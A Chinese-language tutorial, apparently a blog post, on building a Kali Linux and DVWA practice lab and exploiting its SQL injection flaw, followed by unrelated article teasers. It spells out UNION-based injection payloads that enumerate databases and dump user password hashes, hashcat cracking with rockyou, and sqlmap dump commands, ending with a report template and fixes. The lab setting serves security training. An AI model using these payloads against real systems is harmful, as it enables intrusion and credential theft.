如何成为黑客:(Kali配置与DVWA渗透实战全攻略)

发布时间:2026/7/24 18:22:08

如何成为黑客:(Kali配置与DVWA渗透实战全攻略)
第一部分环境搭建步步截图级详细步骤1准备虚拟机与Kali Linux下载并安装虚拟机软件ul前往VirtualBox(https://www.virtualbox.org/) 或VMware Workstation Player(Fusion and Workstation | VMware) 官网下载并安装对应您主机系统Windows/macOS/Linux的版本。下载Kali Linux镜像访问Kali Linux 官方下载页(Get Kali | Kali Linux)选择 “Kali Linux Virtual Machines”下载适用于您虚拟机软件的版本如.ova用于 VirtualBox.vmx用于 VMware。导入并启动KaliVirtualBox打开软件 - 管理 - 导入虚拟电脑 - 选择下载的.ova文件 - 点击“导入”。导入后在列表中选择它点击“启动”。VMware打开软件 - 文件 - 打开 - 选择下载的.vmx文件。打开后点击“播放虚拟机”。默认登录凭证用户名kali密码kali。更新系统在Kali终端中执行sudo apt update sudo apt full-upgrade -y 步骤2配置攻击机Kali网络与工具设置网络为桥接模式确保攻击机和靶机在同一局域网在虚拟机软件中找到 Kali 虚拟机的设置 → 网络 → 连接方式 → 选择桥接网卡。这样 Kali 会从您的家庭路由器获取一个独立IP如同另一台真实电脑。获取Kali的IP地址ip addr show找到inet后面的地址如192.168.1.105记下它。安装并启动必要服务# 启动Apache和MySQL服务部分工具依赖 sudo systemctl start apache2 sudo systemctl start mysql 设置MySQL root密码按提示操作 sudo mysql_secure_installation步骤3部署靶机DVWA下载并解压DVWApresudo wget https://github.com/digininja/DVWA/archive/master.zip sudo unzip master.zip sudo mv DVWA-master dvwa配置数据库# 登录MySQL密码是上一步设置的 sudo mysql -u root -p在 MySQL 提示符下依次执行preCREATE USER dvwalocalhost IDENTIFIED BY pssw0rd; GRANT ALL PRIVILEGES ON dvwa.* TO dvwalocalhost; FLUSH PRIVILEGES; exit;配置DVWAcd /var/www/html/dvwa/config sudo cp config.inc.php.dist config.inc.php sudo nano config.inc.php 找到以下行确保它们与下面一致$_DVWA[ db_password ] 必须与上面创建的密码匹配 php $_DVWA[ db_server ] 127.0.0.1; $_DVWA[ db_database ] dvwa; $_DVWA[ db_user ] dvwa; $_DVWA[ db_password ] pssw0rd; $_DVWA[ default_security_level ] low; // 将安全级别设为“低”便于练习 按 CtrlX然后按 Y再按 Enter 保存退出。修改文件权限并重启服务sudo chown -R www-data:www-data /var/www/html/dvwa sudo chmod -R 755 /var/www/html/dvwa sudo systemctl restart apache2 访问DVWA在Kali的浏览器中打开http://127.0.0.1/dvwa/setup.php。点击页面底部的“Create / Reset Database”按钮。成功后使用默认凭证登录用户名admin密码password。第二部分实战操作以SQL注入为例步骤1侦察与目标确认在Kali中打开终端确认靶机DVWA的IP。由于靶机就是Kali本机所以IP是127.0.0.1。使用nmap快速扫描确认服务 应能看到80/tcp open http Apache httpd。步骤2手动SQL注入漏洞利用极度详细访问漏洞页面在浏览器中登录DVWA (http://127.0.0.1/dvwa)。左侧菜单栏点击DVWA Security将安全级别设为Low点击Submit。点击SQL Injection。探测注入点在输入框User ID中输入1点击Submit。页面显示用户ID为1的用户信息admin。关键测试1错误探测输入1数字1加一个单引号点击提交。观察页面返回SQL语法错误信息如You have an error in your SQL syntax...。这强烈暗示存在SQL注入漏洞因为单引号破坏了原SQL语句结构。关键测试2逻辑验证输入1 AND 11点击提交。页面应正常返回ID为1的用户信息。再输入1 AND 12点击提交。页面应返回空因为12为假。这确认我们可以通过注入逻辑控制SQL查询条件。确定字段数为UNION查询做准备输入1 ORDER BY 1 #提交。页面正常。输入1 ORDER BY 2 #提交。页面正常。输入1 ORDER BY 3 #提交。观察页面可能报错或返回空。这说明原始查询结果有2列。#是MySQL的注释符用于注释掉后面的SQL代码。使用UNION查询获取数据库信息输入1 UNION SELECT 1,2 #提交。观察页面某处通常在ID和First name位置会显示数字1和2。这表示这两个位置可以回显我们UNION查询的结果。获取当前数据库名输入1 UNION SELECT database(), version() #提交。页面会在对应位置显示当前数据库名应为dvwa和MySQL版本号。获取所有数据库名输入1 UNION SELECT schema_name, NULL FROM information_schema.schemata #提交。页面会列出MySQL中所有数据库的名称。获取当前数据库的所有表名输入1 UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema database() #提交。页面会显示dvwa数据库中的所有表如guestbook、users等。获取关键表如users的列名输入1 UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_schema database() AND table_name users #提交。页面会显示users表的所有列名如user_id、first_name、last_name、user、password、avatar等。最终攻击拖取用户凭证输入1 UNION SELECT user, password FROM users #提交。页面将直接显示所有用户名和经过MD5哈希的密码。例如admin的密码哈希是5f4dcc3b5aa765d61d8327deb882cf99。密码破解离线复制5f4dcc3b5aa765d61d8327deb882cf99。在Kali终端中使用hashcat或在线MD5解密网站仅用于练习进行破解。这是一个非常简单的MD5哈希对应明文是password。使用hashcat的命令示例echo 5f4dcc3b5aa765d61d8327deb882cf99 hash.txt hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --forcerockyou.txt是Kali自带的常用密码字典。步骤3使用自动化工具sqlmap进行验证启动Burp Suite并设置代理可选用于拦截请求ul在Kali中打开Burp Suite (Community Edition)。打开浏览器设置代理为127.0.0.1:8080。访问DVWA的SQL注入页面提交一个正常请求如id1在Burp中拦截该请求将其右键 - Copy to file保存为request.txt。使用sqlmap在终端中进入保存request.txt的目录执行sqlmap -r request.txt --batch --dbs * -r request.txt从文件中读取HTTP请求。 * --batch以非交互模式运行自动选择默认选项。 * --dbs枚举数据库。sqlmap会自动检测注入点、类型并列出所有数据库。后续可以使用-D dvwa --tables枚举表-D dvwa -T users --dump导出表数据。第三部分环境清理与报告模板清理# 在Kali中删除DVWA sudo rm -rf /var/www/html/dvwa # 在MySQL中删除数据库和用户 sudo mysql -u root -pDROP DATABASE dvwa; DROP USER dvwalocalhost; exit;渗透测试报告简化模板# 渗透测试报告 - DVWA靶场 目标: http://127.0.0.1/dvwa 测试类型: 授权白盒测试 发现日期: [日期] 1. 高危漏洞 - SQL注入 (CWE-89) 位置: /dvwa/vulnerabilities/sqli/ 参数: id (GET) 安全级别: Low 漏洞描述 应用程序未对用户输入的id参数进行过滤直接拼接至SQL查询语句中导致攻击者可执行任意SQL命令。 复现步骤 访问 http://127.0.0.1/dvwa/vulnerabilities/sqli/。 在输入框输入 1 UNION SELECT user, password FROM users # 点击提交。 影响 成功获取users表中所有用户的登录名及MD5哈希密码导致凭证泄露可进一步破解并获取系统权限。 修复建议 使用参数化查询预编译语句。 PHP示例使用PDO $stmt-gt;execute([id gt;$id]); $results $stmt-gt;fetchAll();对输入进行严格的类型转换如intval($id)。遵循最小权限原则数据库用户不应拥有information_schema的访问权限。

相关新闻

太空AI化:技术奇点与轨道计算的未来

太空AI化:技术奇点与轨道计算的未来

2026/7/24 18:22:08

1. 访谈核心观点解析马斯克在最新3小时访谈中提出的太空与AI发展预测,本质上是对技术奇点临近的又一次预警。这位科技狂人向来以激进的时间表著称,但这次提出的"36个月窗口期"理论确实包含几个值得深思的技术逻辑:首先将太空视为AI…

LLM微调私有化训练平台架构实战:企业私有数据LoRA增量微调、脱敏闭环与资源隔离生产落地方案

LLM微调私有化训练平台架构实战:企业私有数据LoRA增量微调、脱敏闭环与资源隔离生产落地方案

2026/7/24 18:12:08

前言金融、政务、医疗、政企行业存在大量高涉密、强合规、禁止出网的私有业务数据,无法使用公有云在线微调、无法投喂第三方API、无法公开训练。通用大模型存在行业知识缺失、话术不专业、合规性不足、无法适配内部流程等问题,企业必须基于自有数据完成私…

LingBot-World:基于强化学习的智能对话系统架构与实践

LingBot-World:基于强化学习的智能对话系统架构与实践

2026/7/24 18:12:08

1. LingBot-World项目概述LingBot-World是一个基于强化学习技术的智能对话系统框架,它融合了神经网络架构搜索(NAS)和多智能体强化学习(MARL)等前沿技术。这个项目最吸引我的地方在于它采用了类似NAS-RL的架构搜索机制,通过RNN控制器自动生成和优化对话模…

2026数字孪生国产化进入“交付验证期”:五类头部企业能力与项目选型分析

2026数字孪生国产化进入“交付验证期”:五类头部企业能力与项目选型分析

2026/7/24 19:12:10

30秒结论数字孪生国产化的竞争重点已经发生变化。过去,企业主要证明产品“支持国产环境”;现在,采购方更关心系统能否在国产CPU、GPU、操作系统、数据库和服务器环境中稳定运行,并继续完成三维渲染、实时数据接入、业务配置、仿真…

数字孪生原生AI与通用大模型谁主导物理智能?五层技术架构解析

数字孪生原生AI与通用大模型谁主导物理智能?五层技术架构解析

2026/7/24 19:12:10

物理智能赛道不会由通用大模型厂商或数字孪生厂商单独主导。通用大模型厂商更擅长语言理解、知识推理、任务规划与模型泛化;数字孪生原生AI厂商则更接近真实产业现场,掌握空间建模、物理仿真、合成数据、设备连接和行业交付能力。决定物理智能竞争格局的…

政务热线智能坐席系统:NLP与微服务架构实践

政务热线智能坐席系统:NLP与微服务架构实践

2026/7/24 19:12:10

1. 项目背景与核心价值政务热线作为连接政府与民众的重要桥梁,每天需要处理大量咨询、投诉和建议。传统人工坐席模式存在响应速度慢、服务质量不稳定、工单流转效率低等问题。我在某市12345热线数字化改造项目中,主导开发了这套智能坐席系统,…

【提示词降重改写黄金法则】:20年NLP工程师亲授5大不可外泄的语义保真降重技术

【提示词降重改写黄金法则】:20年NLP工程师亲授5大不可外泄的语义保真降重技术

2026/7/24 19:12:10

更多请点击: https://intelliparadigm.com 第一章:提示词降重改写的核心挑战与语义保真边界 提示词降重改写并非简单的同义替换或句式重组,其本质是在保持任务意图、领域约束与推理路径不变的前提下,对语言表征进行可控扰动。这一…

ARMday06-IMX6ULL-CCM clock tree

ARMday06-IMX6ULL-CCM clock tree

2026/7/24 19:12:10

SOC时钟配置你做了哪些工作首先在时钟树上配置arm线,arm线不能直接运行,因为24Mhz到996Mhz会导致死机等故障所以通过MMU先在另一条线上配置好后通过MMU切换到主线路上然后配置PLL下的PFD,有两个型号528和480,他们分别有四个不同频…

Claude模型的道德AI框架与实践解析

Claude模型的道德AI框架与实践解析

2026/7/24 19:02:10

1. Anthropic与Claude模型的核心道德框架解析当Anthropic在2021年由前OpenAI团队创立时,其创始人Dario Amodei就明确表示:"我们要建造的AI系统,必须从底层架构就嵌入安全性和可解释性"。这种理念直接催生了《Claude公约》——这份被…

微服务进阶:服务网格与Istio

微服务进阶:服务网格与Istio

2026/7/24 4:17:29

541|微服务进阶:服务网格与Istio 上篇文章我们聊了微服务的基本概念和拆分方法。 但微服务多了,问题也多了: 服务之间怎么通信? 怎么监控每个服务的调用链路? 熔断、限流、重试怎么做? 安全认证怎么统一? 以前这些都靠SDK库(比如Hystrix、Feign),每个服务都要集成…

零售超级终端全域协同:ShareKit 碰一碰商品流转业务落地案例

零售超级终端全域协同:ShareKit 碰一碰商品流转业务落地案例

2026/7/23 4:40:05

一、零售门店全域协同业务背景与行业痛点 1.1 门店超级终端设备矩阵(连锁便利店/商超标准配置) 自助收银Kiosk一体机:顾客结算、自助核销优惠券、商品素材预览;运营折叠平板:店长后台商品上新、图片录入、活动配置、…

噗叽短视频界面分析

噗叽短视频界面分析

2026/7/23 1:54:13

1 和小红书类似,可以采用类似判断方法------------其实他比小红书好判断,因为他没有图片,控件位置几乎是固定的,都不用判断------------2 因为他没有点赞按钮------------而且几乎所有控件位置都是完全一样的,所以我就…

Django毕设项目:基于 Django 的 智能化学生综合素质测评审核系统 校园学生评优评奖综合管理系统(源码+文档,讲解、调试运行,定制等)

Django毕设项目:基于 Django 的 智能化学生综合素质测评审核系统 校园学生评优评奖综合管理系统(源码+文档,讲解、调试运行,定制等)

2026/7/24 0:01:07

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

[具身智能-634]:Python 封装的地平线 VIO 多媒体库:libsrcampy库详解

[具身智能-634]:Python 封装的地平线 VIO 多媒体库:libsrcampy库详解

2026/7/24 0:01:07

srcampy /libsrcampy 名称释义先明确结论: 官方文档没有公布标准化英文全称,是地平线内部项目缩写;行业公认拆解如下:srcampy Source Amplifier Python bindingsrc Source(图像源:MIPI Sensor、视频源&am…

用Highcharts 创建可拖拽三维散点立方体3D图表

用Highcharts 创建可拖拽三维散点立方体3D图表

2026/7/24 0:01:07

该案例基于Highcharts scatter3d 三维散点图实现空间立方体散点可视化,核心特色:三维 X/Y/Z 三轴空间,所有散点分布在 0~10 立方体空间内;散点使用径向渐变实现立体 3D 圆球质感;支持鼠标 / 触屏拖拽画布,…